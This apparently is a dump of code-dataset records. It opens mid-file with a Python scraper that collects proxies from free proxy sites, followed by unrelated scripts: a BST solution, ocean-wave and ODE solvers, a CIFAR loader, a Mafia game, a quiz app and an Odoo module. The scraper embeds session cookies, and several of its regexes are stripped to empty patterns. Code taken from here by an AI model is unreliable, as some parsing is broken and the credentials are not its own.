ip_address.findall(html)\n # for address, port in re_ip_address:\n # result = address+':'+ port\n # yield result.replace(' ', '')\n \n def crawl_kuaidaili(self):\n for i in range(1, 4):\n start_url = 'http://www.kuaidaili.com/free/inha/{}/'.format(i)\n html = get_page(start_url)\n if html:\n ip_address = re.compile('(.*?)') \n re_ip_address = ip_address.findall(html)\n port = re.compile('(.*?)')\n re_port = port.findall(html)\n for address,port in zip(re_ip_address, re_port):\n address_port = address+':'+port\n yield address_port.replace(' ','')\n\n def crawl_xicidaili(self):\n '''\n 网站已停止维护——20201216\n :return:\n '''\n for i in range(1, 3):\n start_url = 'http://www.xicidaili.com/nn/{}'.format(i)\n headers = {\n 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',\n 'Cookie':'_free_proxy_session=BAh7B0kiD3Nlc3Npb25faWQGOgZFVEkiJWRjYzc5MmM1MTBiMDMzYTUzNTZjNzA4NjBhNWRjZjliBjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMUp6S2tXT3g5a0FCT01ndzlmWWZqRVJNek1WanRuUDBCbTJUN21GMTBKd3M9BjsARg%3D%3D--2a69429cb2115c6a0cc9a86e0ebe2800c0d471b3',\n 'Host':'www.xicidaili.com',\n 'Referer':'http://www.xicidaili.com/nn/3',\n 'Upgrade-Insecure-Requests':'1',\n }\n html = get_page(start_url, options=headers)\n if html:\n find_trs = re.compile('(.*?)', re.S)\n trs = find_trs.findall(html)\n for tr in trs:\n find_ip = re.compile('(\\d+\\.\\d+\\.\\d+\\.\\d+)') \n re_ip_address = find_ip.findall(tr)\n find_port = re.compile('(\\d+)')\n re_port = find_port.findall(tr)\n for address,port in zip(re_ip_address, re_port):\n address_port = address+':'+port\n yield address_port.replace(' ','')\n \n def crawl_ip3366(self):\n '''\n 此网站已经不再维护 ——20201216\n :return:\n '''\n for i in range(1, 4):\n start_url = 'http://www.ip3366.net/?stype=1&page={}'.format(i)\n html = get_page(start_url)\n if html:\n find_tr = re.compile('(.*?)', re.S)\n trs = find_tr.findall(html)\n for s in range(1, len(trs)):\n find_ip = re.compile('(\\d+\\.\\d+\\.\\d+\\.\\d+)')\n re_ip_address = 
find_ip.findall(trs[s])\n find_port = re.compile('(\\d+)')\n re_port = find_port.findall(trs[s])\n for address,port in zip(re_ip_address, re_port):\n address_port = address+':'+port\n yield address_port.replace(' ','')\n \n def crawl_iphai(self):\n '''\n 网站已停止维护——20201216\n :return:\n '''\n start_url = 'http://www.iphai.com/'\n html = get_page(start_url)\n if html:\n find_tr = re.compile('(.*?)', re.S)\n trs = find_tr.findall(html)\n for s in range(1, len(trs)):\n find_ip = re.compile('\\s+(\\d+\\.\\d+\\.\\d+\\.\\d+)\\s+', re.S)\n re_ip_address = find_ip.findall(trs[s])\n find_port = re.compile('\\s+(\\d+)\\s+', re.S)\n re_port = find_port.findall(trs[s])\n for address,port in zip(re_ip_address, re_port):\n address_port = address+':'+port\n yield address_port.replace(' ','')\n\n def crawl_data5u(self):\n # start_url = 'http://www.data5u.com/free/gngn/index.shtml'\n start_url = 'http://www.data5u.com/'\n headers = {\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',\n 'Accept-Encoding': 'gzip, deflate',\n 'Accept-Language': 'en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7',\n 'Cache-Control': 'max-age=0',\n 'Connection': 'keep-alive',\n 'Cookie': 'JSESSIONID=47AA0C887112A2D83EE040405F837A86',\n 'Host': 'www.data5u.com',\n # 'Referer': 'http://www.data5u.com/free/index.shtml',\n 'Upgrade-Insecure-Requests': '1',\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36',\n }\n html = get_page(start_url, options=headers)\n if html:\n # ip_address = re.compile('
  • (\\d+\\.\\d+\\.\\d+\\.\\d+)
  • .*?
  • (\\d+)
  • ', re.S)\n # re_ip_address = ip_address.findall(html)\n # for address, port in re_ip_address:\n # result = address + ':' + port\n # yield result.replace(' ', '')\n select = Selector(text=html)\n lis = select.xpath('//ul/li//ul[@class=\"l2\"]')\n if len(lis):\n # ips = []\n for li in lis:\n host = li.xpath('.//span[1]/li/text()').extract_first()\n port = li.xpath('.//span[2]/li/text()').extract_first()\n # print(host, ':', port)\n yield host + ':' + port\n\n\n def crawl_data5u_2(self):\n '''\n 获取‘每日免费代理’通知中心的公告内的代理信息\n :return:\n '''\n headers = {\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',\n 'Accept-Encoding': 'gzip, deflate',\n 'Accept-Language': 'en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7',\n 'Cache-Control': 'max-age=0',\n 'Connection': 'keep-alive',\n 'Cookie': 'JSESSIONID=47AA0C887112A2D83EE040405F837A86',\n 'Host': 'www.data5u.com',\n # 'Referer': 'http://www.data5u.com/free/index.shtml',\n 'Upgrade-Insecure-Requests': '1',\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36',\n }\n yesterday = date.today() + timedelta(days=-1)\n today = date.today()\n url_x = ['isp', 'http', 'https', 'province']\n url_base = 'http://www.data5u.com/freeip/{}-{}.html'\n urls_yesterday = []\n urls_today = []\n urls = []\n for i in url_x:\n urls_yesterday = url_base.format(yesterday, i)\n urls_today = url_base.format(today, i)\n # print(url)\n urls.extend([urls_yesterday, urls_today])\n for url in urls:\n html = get_page(url, options=headers)\n if html:\n pattern = '\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}:\\d{1,4}'\n pattern_com = re.compile(pattern, re.S)\n ips = re.findall(pattern_com, html)\n # print(ips)\n if ips:\n yield ips\n\n\n\n ","sub_path":"proxypool/crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":9526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} 
+{"seq_id":"166794578","text":"#!/anaconda3/bin/python\n\n# Definition for a binary tree node.\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution(object):\n def sortedArrayToBST(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: TreeNode\n \"\"\"\n if nums:\n length = len(nums)\n root = TreeNode(nums[length / 2])\n self.toBST(nums, root, length / 2, 0, length - 1)\n return root\n\n def toBST(self, nums, root, ind, left, right):\n if left < ind:\n i = (left + ind - 1) / 2\n root.left = TreeNode(nums[i])\n self.toBST(nums, root.left, i, left, ind - 1)\n if right > ind:\n i = (ind + 1 + right) / 2\n root.right = TreeNode(nums[i])\n self.toBST(nums, root.right, i, ind + 1, right)\n\n","sub_path":"q108.py","file_name":"q108.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"306168293","text":"# engineering/subsea_pipeline/mechanics/freespans_VIV\n# 2011_thesis_VIV_506763.pdf\n# p 16\nimport numpy as np\nimport scipy.optimize\nimport matplotlib.pyplot as plt\n\ndef wave_velocity(H, T, depth, z, grav_acc=9.81): \n omega = 2*np.pi/T\n print(\"omega=\", omega)\n k = omega**2/grav_acc\n print(\"k=\", k)\n _lambda = 2*np.pi/k\n print(\"lambda=\", _lambda)\n u_w = np.pi*H/T * np.cosh(k*(z+depth))/np.sinh(k*depth)\n return u_w\n\ndef phillips_constant(H_s, omega_p, gamma, grav_acc=9.81):\n phillips = 5/16 * H_s**2 * omega_p**4 / grav_acc**2 *(1-0.287*np.log(gamma))\n return phillips\n\ndef JONSWAP(omega, H_s, T_p, grav_acc=9.81, gamma=None):\n omega_p = 2*np.pi/T_p\n sigma = np.full(omega.shape, 0.09)\n sigma[omega<=omega_p] = 0.07\n phi = T_p / np.sqrt(H_s)\n if not gamma:\n if phi<=3.6:\n gamma = 5\n elif 3.6= 3 and CASE_CHOOSE <= 7:\n z = r[2]\n fxd = 10*(y-x)\n if CASE_CHOOSE == 3:\n fyd = x*(28-z)-y\n elif CASE_CHOOSE == 4:\n fyd = x*(24-z)-y\n elif CASE_CHOOSE == 5:\n fyd = x*(20-z)-y\n elif 
CASE_CHOOSE == 6:\n fyd = x*(10-z)-y\n elif CASE_CHOOSE == 7:\n fyd = x*(0.5-z)-y\n fzd = x*y-8/3*z\n return np.array([fxd,fyd,fzd],float)\n else:\n raise ValueError('CASE_CHOOSE must be in the set {0,1,2,3,4,5,6,7}')\n return np.array([fxd, fyd], float)\n\nxpoints, ypoints = [], []\nzpoints = []\nif CASE_CHOOSE == 0:\n # Time step\n h=0.001\n # t series\n tpoints = np.arange(0, 20, h)\n # Initial value\n r = np.array([4, 2], float)\n jump = 50;\nelif CASE_CHOOSE == 1:\n h=0.001\n tpoints = np.arange(0, 30, h)\n r = np.array([1, 0.5], float)\n jump = 10;\nelif CASE_CHOOSE == 2:\n h=0.001\n tpoints = np.arange(0, 40, h)\n r = np.array([100, 20], float)\n jump = 10;\nelif CASE_CHOOSE >= 3 and CASE_CHOOSE <= 7:\n h=0.001\n jump = 10;\n if CASE_CHOOSE == 3:\n tpoints = np.arange(0, 40, h)\n r = np.array([0, 2, 9], float)\n elif CASE_CHOOSE == 4:\n tpoints = np.arange(0, 40, h)\n r = np.array([0, 2, 9], float)\n elif CASE_CHOOSE == 5:\n tpoints = np.arange(0, 40, h)\n r = np.array([0, 2, 9], float)\n elif CASE_CHOOSE == 6:\n tpoints = np.arange(0, 8, h)\n r = np.array([0, 2, 9], float)\n elif CASE_CHOOSE == 7:\n tpoints = np.arange(0, 5, h)\n r = np.array([0, 2, 9], float)\n\nelse:\n raise ValueError('CASE_CHOOSE must be in the set {0,1,2,3,4,5,6,7}')\n\nfor t in tpoints:\n xpoints.append(r[0])\n ypoints.append(r[1])\n if len(r) == 3:\n zpoints.append(r[2])\n r += rk4(r, t, h)\n\nif len(r) == 2:\n equationdata = np.array(list(zip(tpoints[0:-1:jump],xpoints[0:-1:jump],ypoints[0:-1:jump])))\nelif len(r) == 3:\n equationdata = np.array(list(zip(tpoints[0:-1:jump],xpoints[0:-1:jump],ypoints[0:-1:jump], zpoints[0:-1:jump])))\n\nnp.savetxt('EquationData_'+str(CASE_CHOOSE)+'.txt',equationdata)\n\nif len(r) == 2:\n fig, (ax1, ax2) = plt.subplots(1, 2)\n ax1.plot(tpoints, xpoints)\n ax1.plot(tpoints, ypoints)\n ax1.set_title('time evol')\n ax2.plot(xpoints, ypoints)\n ax2.set_title('phase')\n if not os.path.exists('pdf'):\n os.makedirs('pdf')\n 
fig.savefig('pdf/lv{}.pdf'.format(CASE_CHOOSE), bbox_inches='tight')\n plt.show()\nelif len(r) == 3:\n\n fig = plt.figure(figsize=(12, 4), facecolor='white')\n ax1 = fig.add_subplot(321, frameon=False)\n ax2 = fig.add_subplot(323, frameon=False)\n ax3 = fig.add_subplot(325, frameon=False)\n ax4 = fig.add_subplot(322, frameon=False)\n ax5 = fig.add_subplot(324, frameon=False)\n ax6 = fig.add_subplot(326, frameon=False)\n ax1.plot(tpoints, xpoints)\n ax2.plot(tpoints, ypoints)\n ax3.plot(tpoints, zpoints)\n ax4.plot(xpoints, ypoints)\n ax5.plot(xpoints, zpoints)\n ax6.plot(ypoints, zpoints)\n #ax1.set_title('t-x')\n #ax2.set_title('t-y')\n #ax3.set_title('t-z')\n if not os.path.exists('pdf'):\n os.makedirs('pdf')\n fig.savefig('pdf/lv{}.pdf'.format(CASE_CHOOSE), bbox_inches='tight')\n plt.show()\n","sub_path":"reaction/LV.py","file_name":"LV.py","file_ext":"py","file_size_in_byte":3917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"365770776","text":"productDict = {}\n\nwhile True:\n command = input()\n if command == 'buy':\n [print(f\"{k} -> {productDict[k][0]*productDict[k][1]:.2f}\") for k in productDict.keys()]\n break\n else:\n commandSplit = command.split(' ')\n item = commandSplit[0]\n price = float(commandSplit[1])\n quantity = int(commandSplit[2])\n if item not in productDict:\n productDict[item] = [price,quantity]\n else:\n productDict[item][0] = price\n productDict[item][1] += quantity","sub_path":"Excercise Dictionaries/4_Orders.py","file_name":"4_Orders.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"41517859","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport os\nimport pickle\nimport platform\nimport seaborn as sns\n\ndef showPicture(x_train, y_train):\n classes = ['plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck']\n num_classes = 
len(classes)\n samples_per_classes = 7\n for y, cls in enumerate(classes):\n idxs = np.flatnonzero(y_train == y)\n idxs = np.random.choice(idxs, samples_per_classes, replace=False)\n for i, idx in enumerate(idxs):\n plt_index = i*num_classes +y + 1\n plt.subplot(samples_per_classes, num_classes, plt_index)\n plt.imshow(x_train[idx].astype('uint8'))\n plt.axis('off')\n if i == 0:\n plt.title(cls)\n plt.show()\n\ndef load_pickle(f):\n version = platform.python_version_tuple()\n if version[0] == '2':\n return pickle.load(f)\n elif version[0] == '3':\n return pickle.load(f, encoding='latin1')\n raise ValueError(\"invalid python version: {}\".format(version))\n\ndef loadCIFAR_batch(filename):\n with open(filename, 'rb') as f:\n datadict = load_pickle(f)\n x = datadict['data']\n y = datadict['labels']\n x = x.reshape(10000, 3, 32, 32).transpose(0, 3, 2, 1).astype('float')\n y = np.array(y)\n return x, y\n\ndef loadCIFAR10(root):\n xs = []\n ys = []\n for b in range(1, 6):\n f = os.path.join(root, 'data_batch_%d' % (b, ))\n x, y = loadCIFAR_batch(f)\n xs.append(x)\n ys.append(y)\n X = np.concatenate(xs)\n Y = np.concatenate(ys)\n x_test, y_test = loadCIFAR_batch(os.path.join(root, 'test_batch'))\n return X, Y, x_test, y_test\n\ndef data_validation(x_train, y_train, x_test, y_test):\n num_training = 49000\n num_validation = 1000\n num_test = 1000\n num_dev = 500\n mean_image = np.mean(x_train, axis=0)\n x_train -= mean_image\n mask = range(num_training, num_training + num_validation)\n X_val = x_train[mask]\n Y_val = y_train[mask]\n mask = range(num_training)\n X_train = x_train[mask]\n Y_train = y_train[mask]\n mask = np.random.choice(num_training, num_dev, replace=False)\n X_dev = x_train[mask]\n Y_dev = y_train[mask]\n mask = range(num_test)\n X_test = x_test[mask]\n Y_test = y_test[mask]\n X_train = np.reshape(X_train, (X_train.shape[0], -1))\n X_val = np.reshape(X_val, (X_val.shape[0], -1))\n X_test = np.reshape(X_test, (X_test.shape[0], -1))\n X_dev = 
np.reshape(X_dev, (X_dev.shape[0], -1))\n X_train = np.hstack([X_train, np.ones((X_train.shape[0], 1))])\n X_val = np.hstack([X_val, np.ones((X_val.shape[0], 1))])\n X_test = np.hstack([X_test, np.ones((X_test.shape[0], 1))])\n X_dev = np.hstack([X_dev, np.ones((X_dev.shape[0], 1))])\n return X_val, Y_val, X_train, Y_train, X_dev, Y_dev, X_test, Y_test\n pass\n\nif __name__ == '__main__':\n cifar10_name = '../Data/cifar-10-batches-py'\n x_train, y_train, x_test, y_test = loadCIFAR10(cifar10_name)\n print(x_train.shape)\n print(y_train.shape)\n print(x_test.shape)\n print(y_test.shape)\n showPicture(x_train, y_train)\n data_validation(x_train, y_train, x_test, y_test)","sub_path":"MachineLearning/Hinge Loss SVM/toolforData.py","file_name":"toolforData.py","file_ext":"py","file_size_in_byte":3185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"365223466","text":"from abc import ABC\nfrom collections import defaultdict\nfrom sortedcontainers import SortedList\nfrom typing import Union, List, Tuple\n\nimport numpy as np\n\nfrom MafiaLogic.common import Game, TimeOfDay, Player, Team, Priority\nimport MafiaLogic\n\n\nclass MafiaGame(Game, ABC):\n def __init__(self,\n roles: List[Tuple[int, str]] = None,\n names: List[str] = None\n ):\n super().__init__()\n self._action_queue = defaultdict(list)\n self._message_buffer = []\n self._votes = []\n self._vote_counts = defaultdict(int)\n\n if names:\n names = np.random.permutation(names)\n\n i = 0\n if roles:\n for count, role in roles:\n for _ in range(count):\n name = names[i] if names else None\n player = getattr(MafiaLogic.roles, role)(\n game=self,\n player_id=i,\n name=name)\n if player.IS_UNIQUE:\n assert count == 1\n self.players[i] = player\n self.players_by_team[player.TEAM].append(player)\n self.players_by_name[player.name] = player\n i += 1\n\n def start(self):\n while not self._parse(input('')):\n pass\n\n def add_action(self, cb, priority, args=None, 
kwargs=None) -> None:\n self._action_queue[priority.value].append([cb, args, kwargs])\n\n def _advance(self):\n for x in self._message_buffer:\n print(x)\n self._message_buffer = []\n # noinspection PyTypeChecker\n self.time_of_day = TimeOfDay(\n (self.time_of_day.value + 1) % len(TimeOfDay))\n if self.time_of_day == TimeOfDay.Trial:\n for voter, vote in self._votes:\n print(f'{voter.name} voted for {vote}')\n self._votes = []\n winner = max(self._vote_counts.items(), key=lambda t: t[1])[0]\n self._nominee = self.get_player(winner)\n print(f'{self._nominee.name} is on trial!')\n self._vote_counts = defaultdict(int)\n elif self.time_of_day == TimeOfDay.Night:\n for voter, vote in self._votes:\n print(f'{voter.name} voted for {vote}')\n self._votes = []\n winner = max(self._vote_counts.items(), key=lambda t: t[1])[0]\n if winner:\n self._kill(self._nominee)\n print(f'{self._nominee} has been guillotined!')\n else:\n print(f'the town has decided not to guillotine {self._nominee}!')\n self._vote_counts = defaultdict(int)\n elif self.time_of_day == TimeOfDay.Morning:\n for priority in Priority:\n actions = self._action_queue[priority]\n for cb, args, kwargs in actions:\n cb(*args, **kwargs)\n self._action_queue = defaultdict(list)\n\n team = None\n for player in self.players.values():\n if team is None:\n team = player.TEAM\n else:\n if team != player.TEAM or team in [Team.NeutralBenign,\n Team.NeutralChaos,\n Team.NeutralEvil]:\n break\n\n def _kill(self, player: Player):\n del self.players[player.id]\n del self.players_by_name[player.name]\n self.players_by_team[player.TEAM].remove(player)\n self.dead_players[player.id] = player\n self.dead_players_by_name[player.name] = player\n\n def _vote(self, voter, vote):\n self._votes.append([voter, vote])\n self._vote_counts[vote] += 1\n\n def _parse(self, args: str):\n args = list(filter(''.__ne__, args.split(' ')))\n if not args:\n return\n\n if args[0] == 'action':\n try:\n player_id = int(args[1])\n except ValueError:\n 
player_id = args[1]\n player = self.get_player(player_id)\n action_args = args[2:]\n if self.time_of_day != TimeOfDay.Night:\n player.day_action(*action_args)\n else:\n player.at_night(*action_args)\n elif args[0] == 'advance':\n self._advance()\n elif args[0] == 'vote':\n assert self.time_of_day in [TimeOfDay.Nomination, TimeOfDay.Trial]\n try:\n player_id = int(args[1])\n except ValueError:\n player_id = args[1]\n voter = self.get_player(player_id)\n if self.time_of_day == TimeOfDay.Nomination:\n try:\n player_id = int(args[2])\n except ValueError:\n player_id = args[2]\n vote = self.get_player(player_id)\n self._vote(voter, vote)\n","sub_path":"MafiaLogic/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":4928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"209143932","text":"#!/usr/bin/python\n\n# uses the database 'score' and 'history' tables to spice things up.\nimport os\nimport time\nimport datetime\nfrom random import randint\nimport sqlite3\nconn = sqlite3.connect('/Users/kimbrel1/Dropbox/Public/JLinks/quiz.db')\ncurs = conn.cursor()\n\n## get number of questions\ncurs.execute('SELECT * FROM questions')\nresults = curs.fetchall()\ntotalQuestions = len(results)\navoid = int(totalQuestions/2) # don't ask a question again for at least this many questions\n\nnumberCorrect = 0\nnumberAttempts = 0\n\n########## FUNCTIONS ##########\n\ndef getRandom():\n \"Gets a random number, but makes sure it hasn't been picked recently\"\n success = False\n while success == False:\n randomNumber = randint(1,totalQuestions)\n found = False\n for num in avoidList:\n if num == randomNumber:\n found = True\n if found == False:\n success = True\n \n avoidList.append(randomNumber)\n avoidList.pop(0)\n return(randomNumber)\n \ndef getQuestion(n):\n curs.execute('SELECT question,answer FROM questions WHERE id=?',(n,))\n results = curs.fetchall()\n return(results)\n\ndef updateHistory(q,g,c):\n ts = 
time.time()\n st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')\n \n curs.execute('INSERT INTO history (q_id,datetime,guess,correct) VALUES(?, ?, ?, ?)', (q,st,g,c))\n conn.commit()\n \ndef addAnswer(i,a):\n \"adds an answer\"\n curs.execute('SELECT answer FROM questions WHERE id=?',(i,))\n results = curs.fetchall()\n \n newAnswer = [a];\n \n for result in results:\n newAnswer.append(result[0])\n \n updatedAnswer = ''\n for answer in newAnswer:\n updatedAnswer = updatedAnswer + \";\" + str(answer)\n \n curs.execute('UPDATE questions set answer=? where id=?', (updatedAnswer,i))\n conn.commit()\n print(\"\\nUpdated to include \" + updatedAnswer + \"\\n\")\n \ndef correctGuess(g,a):\n correct = False\n answerList = a.split(\";\")\n for answer in answerList:\n if g.lower() == answer.lower():\n correct = True\n if correct == True:\n return True\n else:\n return False\n \n########## QUIZ ##########\n\nguess = ''\navoidList = [0]*avoid\ncounter = 1\nwhile guess != 'q':\n question_id = getRandom()\n fullQuestion = getQuestion(question_id)\n question = ''\n answer = ''\n for part in fullQuestion:\n question = part[0]\n answer = part[1]\n \n guess = input(str(counter) + \". \" + question + \"\\nType your answer (or type 'q' to quit): \")\n \n isCorrect = False\n \n if guess != 'q':\n numberAttempts += 1 \n if correctGuess(guess,answer):\n print(\"\\nCorrect!! (\" + answer + \")\\n\")\n isCorrect = True\n else:\n print(\"Sorry, the correct answer is \" + answer + \"!\")\n \n ## Loop to add an answer to the database\n answerUpdate = input(\"Should your answer be included in the database for this question? 
Type 'y' or 'n':\")\n if answerUpdate == 'y':\n addAnswer(question_id,guess)\n isCorrect = True\n \n updateHistory(question_id,guess,isCorrect)\n if isCorrect:\n numberCorrect += 1\n \n ratioCorrect = int(1000*float(numberCorrect)/float(numberAttempts))/10\n \n input(\"Percent Correct = \" + str(ratioCorrect) + \"\\nType any key to continue...\")\n os.system('clear') \n \n else:\n print(\"Thanks for playing! You got \" + str(numberCorrect) + \" correct out of \" + str(numberAttempts))\n \n counter += 1","sub_path":"takeQuiz.py","file_name":"takeQuiz.py","file_ext":"py","file_size_in_byte":3601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"309656360","text":"# -*- coding:utf-8 -*-\n\nfrom odoo import models, fields, api, _\nfrom odoo.exceptions import UserError\nimport logging\n_logger = logging.getLogger(__name__)\n\n\nclass BsdEpp(models.Model):\n _name = 'bsd.epp'\n _inherit = ['mail.thread', 'mail.activity.mixin', 'portal.mixin']\n _description = 'Execution Planing Production'\n _order = 'bsd_sequence,id'\n\n name = fields.Char(string=\"Lot\", required=True, index=True, copy=False, default='New')\n bsd_description = fields.Text(string=\"Description\")\n bsd_delivery_date = fields.Date(string=\"Delivery Date\")\n bsd_scheduled_date_start = fields.Datetime(string=\"Scheduled Date Start\")\n bsd_scheduled_date_end = fields.Datetime(string=\"Scheduled Date End\")\n bsd_sequence = fields.Integer(string=\"Sequence\")\n bsd_mo_ids = fields.One2many('mrp.production', 'bsd_lot_id', string=\"MO\")\n state = fields.Selection([('draft', 'Draft'), ('plan', 'Plan'), ('fixed', 'Fixed')], default='draft')\n bsd_po_count = fields.Integer(string=\"# PO\", compute='_compute_po')\n bsd_booking_count = fields.Integer(string=\"# Booking\", compute='_compute_booking')\n bsd_check_plan = fields.Boolean(default=False)\n bsd_raw_material_ids = fields.One2many(\"stock.move\", \"bsd_lot_id\", string=\"Raw Material\", 
compute=\"_get_stock_move\")\n bsd_po_material_count = fields.Integer(string=\"# PO\", compute='_compute_po_material')\n bsd_check_update = fields.Char(string=\"Check Update\", compute=\"_compute_update\")\n bsd_char_stock_move = fields.Char(string='Stock move')\n\n @api.multi\n def update_po(self):\n po = self.env['purchase.order'].search([('bsd_lot_id', '=', self.id)])\n state = po.mapped('state')\n _logger.debug(state)\n for i in state:\n if i not in ['draft', 'cancel', 'sent']:\n raise UserError(\"Purchase not in draft or cancel or sent\")\n return {\n 'type': 'ir.actions.act_window',\n 'name': _(\"Update Purchase\"),\n 'res_model': 'bsd.epp.create.purchase',\n 'view_mode': 'form',\n 'view_type': 'form',\n 'context': \"{'default_bsd_choose':'update'}\",\n 'target': 'new',\n }\n\n @api.depends('bsd_mo_ids')\n def _compute_update(self):\n _logger.debug(\"compute update\")\n for each in self:\n id_move = list()\n for mo in each.bsd_mo_ids:\n for raw in mo.move_raw_ids:\n id_move.append(raw.id)\n _logger.debug(id_move)\n if self.bsd_char_stock_move == str(id_move):\n self.bsd_check_update = \"Validated\"\n else:\n self.bsd_check_update = \"Detect Error From Source MO\"\n\n @api.multi\n def _compute_po_material(self):\n for each in self:\n _logger.debug(\"debug tại đây\")\n purchase_ids = self.env['purchase.order'].search([('bsd_lot_id', '=', each.id), ('bsd_mo_id', '=', False)])\n each.bsd_po_material_count = len(purchase_ids)\n\n @api.multi\n def view_po_material(self):\n self.ensure_one()\n domain = [('bsd_lot_id', '=', self.id), ('bsd_mo_id', '=', False)]\n return {\n 'name': _('Purchase Order'),\n 'domain': domain,\n 'res_model': 'purchase.order',\n 'type': 'ir.actions.act_window',\n 'view_mode': 'tree,form,kanban',\n 'view_type': 'form',\n 'help': _('''

    \n Click to Create for new documents\n

    '''),\n }\n\n @api.multi\n def _compute_booking(self):\n for each in self:\n booking_ids = list()\n for mo in each.bsd_mo_ids:\n booking_ids.append(mo.bsd_booking_id.id)\n booking = self.env['bsd.booking'].search([('id', 'in', booking_ids)])\n each.bsd_booking_count = len(booking)\n\n @api.multi\n def view_booking(self):\n booking_ids = list()\n for mo in self.bsd_mo_ids:\n booking_ids.append(mo.bsd_booking_id.id)\n domain = [('id', 'in', booking_ids)]\n return {\n 'name': _('Booking'),\n 'type': 'ir.actions.act_window',\n 'res_model': 'bsd.booking',\n 'view_mode': 'tree,form',\n 'view_type': 'form',\n 'domain': domain,\n }\n\n @api.multi\n def view_mo(self):\n self.ensure_one()\n return {\n 'name': _('Manufacturing Order'),\n 'res_model': 'mrp.production',\n 'type': 'ir.actions.act_window',\n 'view_type': 'form',\n 'view_mode': 'tree,form',\n }\n\n @api.multi\n def _compute_po(self):\n for each in self:\n _logger.debug(\"debug tại đây\")\n purchase_ids = list()\n for mo in each.bsd_mo_ids:\n purchase_ids += self.env['purchase.order'].search([('bsd_mo_id', '=', mo.id)]).ids\n # _logger.debug(purchase_ids)\n each.bsd_po_count = len(purchase_ids)\n\n @api.multi\n def view_po_package(self):\n self.ensure_one()\n mo_ids = self.bsd_mo_ids.ids\n domain = [('bsd_mo_id', 'in', mo_ids)]\n return {\n 'name': _('Purchase Order'),\n 'domain': domain,\n 'res_model': 'purchase.order',\n 'type': 'ir.actions.act_window',\n 'view_mode': 'tree,form,kanban',\n 'view_type': 'form',\n 'help': _('''

    \n Click to Create for new documents\n

    '''),\n }\n\n @api.model\n def create(self, vals):\n if vals.get('name', 'New') == 'New':\n vals['name'] = self.env['ir.sequence'].next_by_code('bsd.epp') or '/'\n return super(BsdEpp, self).create(vals)\n\n @api.multi\n def button_plan_lot(self):\n for each in self:\n each.bsd_mo_ids.button_plan()\n return True\n\n @api.multi\n def view_workorder(self):\n pass\n return {\n 'name': _('Workorder'),\n 'type': 'ir.actions.act_window',\n 'res_model': 'mrp.workorder',\n 'view_id': False,\n 'view_mode': 'gantt',\n 'view_type': 'form',\n 'context': \"{'search_default_bsd_lot_id': True}\"\n }\n\n @api.multi\n def button_plan(self):\n self.ensure_one()\n self.bsd_mo_ids.button_plan()\n self.write({\n 'state': 'plan',\n 'bsd_check_plan': True,\n })\n return True\n\n @api.multi\n def button_unplan(self):\n self.ensure_one()\n self.bsd_mo_ids.button_unplan()\n self.write({\n 'bsd_check_plan': False,\n })\n return True\n\n @api.multi\n def button_fixed(self):\n self.write({\n 'state': 'fixed',\n })\n return True\n\n @api.multi\n def _get_stock_move(self):\n for each in self:\n id_move = list()\n for mo in each.bsd_mo_ids:\n for raw in mo.move_raw_ids:\n id_move.append(raw.id)\n _logger.debug(\"get stock move\")\n _logger.debug(id_move)\n each.bsd_raw_material_ids = [(6, 0, id_move)]","sub_path":"bsd_epp/models/bsd_epp.py","file_name":"bsd_epp.py","file_ext":"py","file_size_in_byte":7219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"289681723","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jan 22 22:35:18 2018\n\n@author: Sumeet Bhambrah\n\nHackerrank | 30 days of coding | data types\n\n\"\"\"\n\ni = 4\nd = 4.0\ns = 'HackerRank '\n\n# Declare second integer, double, and String variables.\nii = 1\ndd = 1.0\nss = \"\"\n# Read and save an integer, double, and String to your variables.\nii = int(input())\ndd = float(input())\nss = input()\n# Print the sum of both integer variables on a new line.\nprint(\"%d\" % 
